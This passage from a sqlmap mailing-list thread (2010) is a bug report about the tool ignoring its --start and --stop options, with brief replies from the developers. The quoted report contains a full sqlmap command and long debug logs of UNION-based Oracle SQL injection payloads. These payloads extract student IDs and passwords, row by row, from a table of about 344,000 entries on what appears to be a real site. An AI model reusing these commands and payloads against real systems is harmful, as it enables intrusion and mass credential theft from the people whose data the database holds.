CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >> > AS VARCHAR(4000)), >> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, >> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >> FROM >> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >> LIMIT=5-- >> > AND 'iNmX'='iNmX >> > [22:52:58] [DEBUG] performed 6 queries in 1 seconds >> > [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, >> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >> AS >> > VARCHAR(4000)), >> > >> CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >> > AS VARCHAR(4000)), >> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, >> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >> FROM >> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >> LIMIT=6-- >> > AND 'mVQM'='mVQM >> > [22:52:58] [DEBUG] performed 7 queries in 0 seconds >> > [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, >> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >> AS >> > VARCHAR(4000)), >> > >> CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >> > AS VARCHAR(4000)), >> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, >> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >> FROM >> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >> LIMIT=7-- >> > AND 'FuqF'='FuqF >> > [22:52:59] [DEBUG] performed 8 queries in 0 seconds >> > [22:52:59] [DEBUG] query: ' UNION ALL SELECT NULL, >> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >> AS >> > VARCHAR(4000)), >> > >> CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >> > AS VARCHAR(4000)), >> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, >> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >> FROM >> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >> LIMIT=8-- >> > AND 'utPd'='utPd >> > [22:53:01] [DEBUG] performed 9 queries in 2 seconds >> > [22:53:01] [DEBUG] query: ' UNION ALL SELECT NULL, >> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >> AS >> > VARCHAR(4000)), >> > >> CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >> > AS VARCHAR(4000)), >> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, >> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >> FROM >> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >> LIMIT=9-- >> > AND 'ilBw'='ilBw >> > [22:53:03] [DEBUG] performed 10 queries in 2 seconds >> > [22:53:03] [DEBUG] query: ' UNION ALL SELECT NULL, >> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >> AS >> > VARCHAR(4000)), >> > >> CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >> > AS VARCHAR(4000)), >> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, >> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >> FROM >> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >> LIMIT=10-- >> > AND 'YxAK'='YxAK >> > ^C >> > [22:53:04] [ERROR] user aborted >> > >> > [*] shutting down at: 22:53:04 >> > >> > >> > >> > As you can see, it will not stop consultation until the fourth, ignoring >> > parameters passed in ("--start" and "--stop"). >> > >> > I gave ctrl + c in the tenth query. >> > >> > Am I doing something wrong or is it anyway? >> > >> > $ svn info >> > Path: . >> > URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap >> > Repository Root: https://svn.sqlmap.org/sqlmap >> > Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb >> > Revision: 1588 >> > Node Kind: directory >> > Schedule: normal >> > Last Changed Author: inquisb >> > Last Changed Rev: 1588 >> > Last Changed Date: 2010-04-23 13:34:20 -0300 (Fri, 23 Apr 2010) >> > >> > -- >> > David Gomes Guimarães >> > >> > >> ------------------------------------------------------------------------------ >> > >> > _______________________________________________ >> > sqlmap-users mailing list >> > sql...@li... >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > >> > >> >> >> >> -- >> Bernardo Damele A. G. >> >> E-mail / Jabber: bernardo.damele (at) gmail.com >> Mobile: +447788962949 (UK 07788962949) >> PGP Key ID: 0x05F5A30F >> > > > > -- > David Gomes Guimarães > -- David Gomes Guimarães |
From: Miroslav S. <mir...@gm...> - 2010-04-26 18:38:16
|
Hi. Sorry, my fault. Bernardo said that he knows where to look for this one so he'll try to solve it soon. Kind regards. On Mon, Apr 26, 2010 at 6:42 PM, David Guimaraes <sk...@gm...> wrote: > Mirvoslav: > Don't work even passing --start 1 or --start 3 or anything in a table with X > rows.. i don't know if this is a oracle error or other thing.. sqlmap simply > ignores the parameter... tested and re-tested... if the table has 100 rows > and I pass --start to him to read until the tenth, he will read them all... > >> On Mon, Apr 26, 2010 at 6:27 AM, Bernardo Damele A. G. >> <ber...@gm...> wrote: >>> >>> Did you try without providing --start and --stop? Let me know please >>> if it correctly dump entries or not. >>> >>> Bernardo >>> >>> >>> On Sat, Apr 24, 2010 at 04:02, David Guimaraes <sk...@gm...> wrote: >>> > Syntax that had problems: >>> > >>> > $ ./sqlmap.py -u "http://www.vuln.com/vuln.asp?a=000408092&b=" -p a >>> > --union-use -T ALU_ALUNOS --dump -C "ALU_RA,ALU_SENHA" --start 0 --stop >>> > 4 -v >>> > 2 >>> > >>> > sqlmap/0.9-dev - automatic SQL injection and database takeover tool >>> > http://sqlmap.sourceforge.net >>> > >>> > [*] starting at: 22:52:50 >>> > >>> > [22:52:50] [DEBUG] initializing the configuration >>> > [22:52:50] [DEBUG] initializing the knowledge base >>> > [22:52:50] [DEBUG] cleaning up configuration parameters >>> > [22:52:50] [DEBUG] setting the HTTP timeout >>> > [22:52:50] [DEBUG] setting the HTTP method to GET >>> > [22:52:50] [DEBUG] creating HTTP requests opener object >>> > [22:52:50] [DEBUG] parsing XML queries file >>> > [22:52:50] [INFO] using '/path/session' as session file >>> > [22:52:50] [INFO] resuming injection point 'GET' from session file >>> > [22:52:50] [INFO] resuming injection parameter 'a' from session file >>> > [22:52:50] [INFO] resuming injection type 'stringsingle' from session >>> > file >>> > [22:52:50] [INFO] resuming 0 number of parenthesis from session file >>> > [22:52:50] [INFO] resuming back-end DBMS 'oracle' from session file >>> > [22:52:50] [INFO] resuming union comment '--' from session file >>> > [22:52:50] [INFO] resuming union count 15 from session file >>> > [22:52:50] [INFO] resuming union position 1 from session file >>> > [22:52:50] [INFO] resuming union false condition 1 from session file >>> > [22:52:50] [INFO] testing connection to the target url >>> > [22:52:50] [DEBUG] got HTTP error code: 500 >>> > [22:52:50] [WARNING] the testable parameter 'a' you provided is not >>> > into the >>> > Cookie >>> > [22:52:50] [INFO] testing for parenthesis on injectable parameter >>> > [22:52:50] [DEBUG] skipping test for MySQL >>> > [22:52:50] [INFO] the back-end DBMS is Oracle >>> > web server operating system: Windows 2000 >>> > web application technology: ASP.NET, Microsoft IIS 6.0, ASP >>> > back-end DBMS: Oracle >>> > >>> > [22:52:50] [WARNING] on Oracle it is only possible to enumerate if you >>> > provide a TABLESPACE_NAME as database name. sqlmap is going to use >>> > 'USERS' >>> > as database name >>> > [22:52:50] [INFO] fetching columns 'ALU_RA, ALU_SENHA' entries for >>> > table >>> > 'ALU_ALUNOS' on database 'USERS' >>> > [22:52:50] [INFO] the SQL query provided has more than a field. sqlmap >>> > will >>> > now unpack it into distinct queries to be able to retrieve the output >>> > even >>> > if we are in front of a partial inband sql injection >>> > [22:52:50] [INFO] read from file '/path': 344305 >>> > [22:52:50] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(COUNT(ALU_RA) >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > ALU_ALUNOS-- AND 'RFOj'='RFOj >>> > [22:52:51] [DEBUG] performed 1 queries in 0 seconds >>> > [22:52:51] [INFO] the SQL query provided returns 344305 entries >>> > [22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=1-- >>> > AND 'qGli'='qGli >>> > [22:52:51] [DEBUG] performed 2 queries in 0 seconds >>> > [22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=2-- >>> > AND 'EXyf'='EXyf >>> > [22:52:53] [DEBUG] performed 3 queries in 1 seconds >>> > [22:52:53] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=3-- >>> > AND 'CLyw'='CLyw >>> > [22:52:56] [DEBUG] performed 4 queries in 2 seconds >>> > [22:52:56] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=4-- >>> > AND 'nHQn'='nHQn >>> > [22:52:57] [DEBUG] performed 5 queries in 0 seconds >>> > [22:52:57] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=5-- >>> > AND 'iNmX'='iNmX >>> > [22:52:58] [DEBUG] performed 6 queries in 1 seconds >>> > [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=6-- >>> > AND 'mVQM'='mVQM >>> > [22:52:58] [DEBUG] performed 7 queries in 0 seconds >>> > [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=7-- >>> > AND 'FuqF'='FuqF >>> > [22:52:59] [DEBUG] performed 8 queries in 0 seconds >>> > [22:52:59] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=8-- >>> > AND 'utPd'='utPd >>> > [22:53:01] [DEBUG] performed 9 queries in 2 seconds >>> > [22:53:01] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=9-- >>> > AND 'ilBw'='ilBw >>> > [22:53:03] [DEBUG] performed 10 queries in 2 seconds >>> > [22:53:03] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=10-- >>> > AND 'YxAK'='YxAK >>> > ^C >>> > [22:53:04] [ERROR] user aborted >>> > >>> > [*] shutting down at: 22:53:04 >>> > >>> > >>> > >>> > As you can see, it will not stop consultation until the fourth, >>> > ignoring >>> > parameters passed in ("--start" and "--stop"). >>> > >>> > I gave ctrl + c in the tenth query. >>> > >>> > Am I doing something wrong or is it anyway? >>> > >>> > $ svn info >>> > Path: . >>> > URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap >>> > Repository Root: https://svn.sqlmap.org/sqlmap >>> > Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb >>> > Revision: 1588 >>> > Node Kind: directory >>> > Schedule: normal >>> > Last Changed Author: inquisb >>> > Last Changed Rev: 1588 >>> > Last Changed Date: 2010-04-23 13:34:20 -0300 (Fri, 23 Apr 2010) >>> > >>> > -- >>> > David Gomes Guimarães >>> > >>> > >>> > ------------------------------------------------------------------------------ >>> > >>> > _______________________________________________ >>> > sqlmap-users mailing list >>> > sql...@li... >>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> > >>> > >>> >>> >>> >>> -- >>> Bernardo Damele A. G. >>> >>> E-mail / Jabber: bernardo.damele (at) gmail.com >>> Mobile: +447788962949 (UK 07788962949) >>> PGP Key ID: 0x05F5A30F >> >> >> >> -- >> David Gomes Guimarães > > > > -- > David Gomes Guimarães > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |